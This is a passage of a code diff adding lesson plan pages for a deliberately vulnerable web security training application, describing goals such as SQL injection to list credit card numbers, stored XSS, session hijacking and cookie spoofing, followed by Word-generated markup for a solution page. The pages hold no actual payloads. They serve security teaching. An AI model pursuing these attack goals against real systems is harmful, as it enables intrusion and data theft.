+<p><b>General Goal(s):</b> </p>
+The form below allows a user to view weather data. Try to inject an SQL string that results in all the weather data being displayed.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/SqlStringInjection.html b/main/project/WebContent/lesson_plans/SqlStringInjection.html
new file mode 100644
index 000000000..32f6d4bac
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/SqlStringInjection.html
@@ -0,0 +1,14 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform String SQL Injection </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. 
+<br><br>
+Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.<br>
+<br>
+It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queiries, even if the threat of SQL injection has been prevented in some other manner.<br>
+<p><b>General Goal(s):</b> </p>
+The form below allows a user to view their credit card numbers. Try to inject an SQL string that results in all the credit card numbers being displayed. Try the user name of 'Smith'.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/StoredXss.html b/main/project/WebContent/lesson_plans/StoredXss.html
new file mode 100644
index 000000000..e2662164f
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/StoredXss.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform Stored Cross Site Scripting (XSS) </p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+The user should be able to add message content that cause another user to load an undesireable page or content.
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/ThreadSafetyProblem.html b/main/project/WebContent/lesson_plans/ThreadSafetyProblem.html
new file mode 100644
index 000000000..1b01a915d
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/ThreadSafetyProblem.html
@@ -0,0 +1,22 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
+<html>
+<head>
+               
+  <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
+  <title>Lesson Plan</title>
+</head>
+  <body>
+ 
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Exploit Thread Safety Problems </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+ Web applications can handle many HTTP requests simultaneously.  Developers often use variables that are not thread safe. &nbsp;Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently. <br>
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+The user should be able to exploit the concurrency error in the web application and view login information for another user that is attempting the same function at the same time.  <b>This will require the use of two browsers</b>. 
+<br>
+</body>
+</html>
diff --git a/main/project/WebContent/lesson_plans/TraceXSS.html b/main/project/WebContent/lesson_plans/TraceXSS.html
new file mode 100644
index 000000000..2358d4fc4
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/TraceXSS.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform Cross Site Tracing (XST) Attacks </p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+It is always a good practice to scrub all input, especially those inputs that will later be used as parameters to OS commands, scripts, and database queries. It is particularly important for content that will be permanently stored somewhere in the application. Users should not be able to create message content that could cause another user to load an undesireable page or undesireable content when the user's message is retrieved.
+<p><b>General Goal(s):</b> </p>
+Tomcat is configured to support the HTTP TRACE command. Your goal is to perform a Cross Site Tracing (XST) attack.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/UncheckedEmail.html b/main/project/WebContent/lesson_plans/UncheckedEmail.html
new file mode 100644
index 000000000..db3c630e9
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/UncheckedEmail.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Exploit Unchecked Email </p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+It is always a good practice to validate all inputs.  Most sites allow non-authenticated users to send email to a 'friend'. This is a great mechanism for spammers to send out email using your corporate mail server.
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+The user should be able to send and obnoxious email message.
diff --git a/main/project/WebContent/lesson_plans/WSDLScanning.html b/main/project/WebContent/lesson_plans/WSDLScanning.html
new file mode 100644
index 000000000..dd80ef598
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/WSDLScanning.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform WSDL Scanning</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file. 
+<p><b>General Goal(s):</b> </p>
+This screen is the API for a web service. Check the WSDL file for this web service and try to get some customer credit numbers.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/WeakAuthenticationCookie.html b/main/project/WebContent/lesson_plans/WeakAuthenticationCookie.html
new file mode 100644
index 000000000..9dad07df8
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/WeakAuthenticationCookie.html
@@ -0,0 +1,10 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Spoof an Authentication Cookie </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Many applications will automatically log a user into their site if the right authentication cookie is specified. &nbsp; Some times the cookie values can be guessed if the algorithm for generating the cookie can be obtained. &nbsp;Some times the cookies are left on the client machine and can be stolen by exploiting another system vulnerability. &nbsp;Some times the cookies maybe intercepted using Cross site scripting. &nbsp;This lesson tries to make the student aware of authentication cookies and presents the student with a way to defeat the cookie authentication method in this lesson.<br>
+<!-- Stop Instructions -->
+<p><b>General Goal(s):</b> </p>
+ The user should be able to bypass the authentication check.
diff --git a/main/project/WebContent/lesson_plans/WeakSessionID.html b/main/project/WebContent/lesson_plans/WeakSessionID.html
new file mode 100644
index 000000000..45157e0b5
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/WeakSessionID.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Hijack a Session</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Application developers who develop their own session IDs frequently forget to incorporate the complexity and randomness necessary for security. If the user specific session ID is not complex and random, then the application is highly susceptible to session-based brute force attacks.
+<p><b>General Goal(s):</b> </p>
+Try to access an authenticated session belonging to someone else.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/WelcomeScreeen.html b/main/project/WebContent/lesson_plans/WelcomeScreeen.html
new file mode 100644
index 000000000..be93e40e2
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/WelcomeScreeen.html
@@ -0,0 +1,16 @@
+<div align="Center">
+<p><b>Lesson Plan Title:Welcome</b> </p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+This lesson presents the basics for understanding the transfer of data between the browser and the web application.
+<p><b>Standards Addressed:</b> </p>
+<p><b>General Goal(s):</b> </p>
+<p><b>Specific Objectives:</b> </p>
+<p><b>Required Materials:</b> </p>
+<p><b>Anticipatory Set (Lead-In):</b> </p>
+<p><b>Step-By-Step Procedures:</b> </p>
+<p><b>Plan For Independent Practice:</b> </p>
+<p><b>Closure (Reflect Anticipatory Set):</b> </p>
+<p><b>Assessment Based On Objectives:</b> </p>
+<p><b>Extensions (For Gifted Students):</b> </p>
+<p><b>Possible Connections To Other Subjects:</b> </p>
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/WsSAXInjection.html b/main/project/WebContent/lesson_plans/WsSAXInjection.html
new file mode 100644
index 000000000..23a2e8607
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/WsSAXInjection.html
@@ -0,0 +1,12 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform Web Service SAX Injection</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file. 
+<p><b>General Goal(s):</b> </p>
+Some web interfaces make use of Web Services in the background. If the frontend relies on the web service for all input validation, it may be possible to corrupt the XML that the web interface sends.
+<br/>
+<br>
+In this exercise, try to change the password for a user other than 101.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/WsSqlInjection.html b/main/project/WebContent/lesson_plans/WsSqlInjection.html
new file mode 100644
index 000000000..95738b0bf
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/WsSqlInjection.html
@@ -0,0 +1,9 @@
+<div align="Center">
+<p><b>Lesson Plan Title:</b> How to Perform Web Service SQL Injection</p>
+</div>
+<p><b>Concept / Topic To Teach:</b> </p>
+<!-- Start Instructions -->
+Web Services communicate through the use of SOAP requests. These requests are submitted to a web service in an attempt to execute a function defined in the web service definition language (WSDL) file. 
+<p><b>General Goal(s):</b> </p>
+Check the web service description language (WSDL) file and try to obtain multiple customer credit card numbers. You will not see the results returned to this screen. When you believe you have suceeded, refresh the page and look for the 'green star'.
+<!-- Stop Instructions -->
\ No newline at end of file
diff --git a/main/project/WebContent/lesson_plans/XMLInjection.html b/main/project/WebContent/lesson_plans/XMLInjection.html
new file mode 100644
index 000000000..fc9c73697
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/XMLInjection.html
@@ -0,0 +1,19 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform XML Injection Attacks. </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+ This lesson teaches how to perform XML Injection attacks.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+AJAX applications use XML to exchange information with the server. This XML can be easily intercepted and altered by a malicious attacker.
+
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+WebGoat-Miles Reward Miles shows all the rewards available. Once you've entered your account ID, the lesson will show you your balance and the products you can afford. Your goal is to try to add more rewards to your allowed set of rewards. Your account ID is 836239.
+<!-- Stop Instructions -->
+
diff --git a/main/project/WebContent/lesson_plans/XPATHInjection.html b/main/project/WebContent/lesson_plans/XPATHInjection.html
new file mode 100644
index 000000000..926d8f151
--- /dev/null
+++ b/main/project/WebContent/lesson_plans/XPATHInjection.html
@@ -0,0 +1,22 @@
+<div align="Center"> 
+<p><b>Lesson Plan Title:</b> How to Perform XPATH Injection Attacks. </p>
+ </div>
+ 
+<p><b>Concept / Topic To Teach:</b> </p>
+ This lesson teaches how to perform XPath Injection attacks.
+ <br> 
+<div align="Left"> 
+<p>
+<b>How the attacks works:</b>
+</p>
+Similar to SQL Injection, XPATH Injection attacks occur when a web site uses user supplied information to query XML data. By sending intentionally malformed information into the web site, an attacker can find out how the XML data is structured or access data that they may not normally have access to.
+They may even be able to elevate their privileges on the web site if the xml data is being used for authentication (such as an xml based user file). 
+
+Querying XML is done with XPath, a type of simple descriptive statement that allows the xml query to locate a piece of information. Like SQL you can specify certain attributes to find and patterns to match. When using XML for a web site it is common to accept some form of input on the query string to identify the content to locate and display on the page. This input must be sanitized to verify that it doesn't mess up the XPath query and return the wrong data. 
+
+
+</div>
+<p><b>General Goal(s):</b> </p>
+<!-- Start Instructions -->
+The form below allows employees to see all their personal data including their salaries. Your account is Mike/test123. Your goal is to try to see other employees data as well.
+<!-- Stop Instructions -->
diff --git a/main/project/WebContent/lesson_solutions/AccessControlMatrix.html b/main/project/WebContent/lesson_solutions/AccessControlMatrix.html
new file mode 100644
index 000000000..457b0ee7d
--- /dev/null
+++ b/main/project/WebContent/lesson_solutions/AccessControlMatrix.html
@@ -0,0 +1,707 @@
+<html xmlns:v="urn:schemas-microsoft-com:vml"
+xmlns:o="urn:schemas-microsoft-com:office:office"
+xmlns:w="urn:schemas-microsoft-com:office:word"
+xmlns:m="http://schemas.microsoft.com/office/2004/12/omml"
+xmlns="http://www.w3.org/TR/REC-html40">
+
+<head>
+<meta http-equiv=Content-Type content="text/html; charset=windows-1252">
+<meta name=ProgId content=Word.Document>
+<meta name=Generator content="Microsoft Word 12">
+<meta name=Originator content="Microsoft Word 12">
+<link rel=File-List href="/WebGoat/lesson_solutions/AccessControlMatrix_files/filelist.xml">
+<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/AccessControlMatrix_files/editdata.mso">
+<!--[if !mso]>
+<style>
+v\:* {behavior:url(#default#VML);}
+o\:* {behavior:url(#default#VML);}
+w\:* {behavior:url(#default#VML);}
+.shape {behavior:url(#default#VML);}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:DocumentProperties>
+  <o:Author>egeirnaert</o:Author>
+  <o:LastAuthor>egeirnaert</o:LastAuthor>
+  <o:Revision>4</o:Revision>
+  <o:TotalTime>25</o:TotalTime>
+  <o:Created>2007-07-11T10:48:00Z</o:Created>
+  <o:LastSaved>2007-07-12T15:24:00Z</o:LastSaved>
+  <o:Pages>2</o:Pages>
+  <o:Words>167</o:Words>
+  <o:Characters>954</o:Characters>
+  <o:Company> </o:Company>
+  <o:Lines>7</o:Lines>
+  <o:Paragraphs>2</o:Paragraphs>
+  <o:CharactersWithSpaces>1119</o:CharactersWithSpaces>
+  <o:Version>12.00</o:Version>
+ </o:DocumentProperties>
+</xml><![endif]-->
+<link rel=themeData href="/WebGoat/lesson_solutions/AccessControlMatrix_files/themedata.thmx">
+<link rel=colorSchemeMapping
+href="/WebGoat/lesson_solutions/AccessControlMatrix_files/colorschememapping.xml">
+<!--[if gte mso 9]><xml>
+ <w:WordDocument>
+  <w:TrackMoves>false</w:TrackMoves>
+  <w:TrackFormatting/>
+  <w:PunctuationKerning/>
+  <w:ValidateAgainstSchemas/>
+  <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
+  <w:IgnoreMixedContent>false</w:IgnoreMixedContent>
+  <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
+  <w:DoNotPromoteQF/>
+  <w:LidThemeOther>EN-US</w:LidThemeOther>
+  <w:LidThemeAsian>X-NONE</w:LidThemeAsian>
+  <w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
+  <w:Compatibility>
+   <w:BreakWrappedTables/>
+   <w:SnapToGridInCell/>
+   <w:WrapTextWithPunct/>
+   <w:UseAsianBreakRules/>
+   <w:DontGrowAutofit/>
+   <w:SplitPgBreakAndParaMark/>
+   <w:DontVertAlignCellWithSp/>
+   <w:DontBreakConstrainedForcedTables/>
+   <w:DontVertAlignInTxbx/>
+   <w:Word11KerningPairs/>
+   <w:CachedColBalance/>
+  </w:Compatibility>
+  <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel>
+  <m:mathPr>
+   <m:mathFont m:val="Cambria Math"/>
+   <m:brkBin m:val="before"/>
+   <m:brkBinSub m:val="--"/>
+   <m:smallFrac m:val="off"/>
+   <m:dispDef/>
+   <m:lMargin m:val="0"/>
+   <m:rMargin m:val="0"/>
+   <m:defJc m:val="centerGroup"/>
+   <m:wrapIndent m:val="1440"/>
+   <m:intLim m:val="subSup"/>
+   <m:naryLim m:val="undOvr"/>
+  </m:mathPr></w:WordDocument>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
+  DefSemiHidden="true" DefQFormat="false" DefPriority="99"
+  LatentStyleCount="267">
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
+  <w:LsdException Locked="false" Priority="0" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
+  <w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 1"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 2"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 3"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 4"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 5"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 6"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 7"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 8"/>
+  <w:LsdException Locked="false" Priority="39" Name="toc 9"/>
+  <w:LsdException Locked="false" Priority="0" QFormat="true" Name="caption"/>
+  <w:LsdException Locked="false" Priority="10" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Title"/>
+  <w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
+  <w:LsdException Locked="false" Priority="11" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
+  <w:LsdException Locked="false" Priority="0" Name="Hyperlink"/>
+  <w:LsdException Locked="false" Priority="22" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
+  <w:LsdException Locked="false" Priority="20" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
+  <w:LsdException Locked="false" Priority="59" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Table Grid"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
+  <w:LsdException Locked="false" Priority="1" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 1"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
+  <w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
+  <w:LsdException Locked="false" Priority="34" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
+  <w:LsdException Locked="false" Priority="29" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
+  <w:LsdException Locked="false" Priority="30" SemiHidden="false"
+   UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 1"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 2"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 2"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 3"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 3"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 4"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 4"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
+  <w:LsdException Locked="false" Priority="60" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="61" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light List Accent 5"/>
+  <w:LsdException Locked="false" Priority="62" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
+  <w:LsdException Locked="false" Priority="63" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="64" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="65" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="66" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="67" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
+  <w:LsdException Locked="false" Priority="68" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
+  <w:LsdException Locked="false" Priority="69" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
+  <w:LsdException Locked="false" Priority="70" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Dark List Accent 5"/>
+  <w:LsdException Locked="false" Priority="71" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
+  <w:LsdException Locked="false" Priority="72" SemiHidden="false"
+   UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
+  <w:LsdException Locked="false" Priority="73" SemiHidden="false"
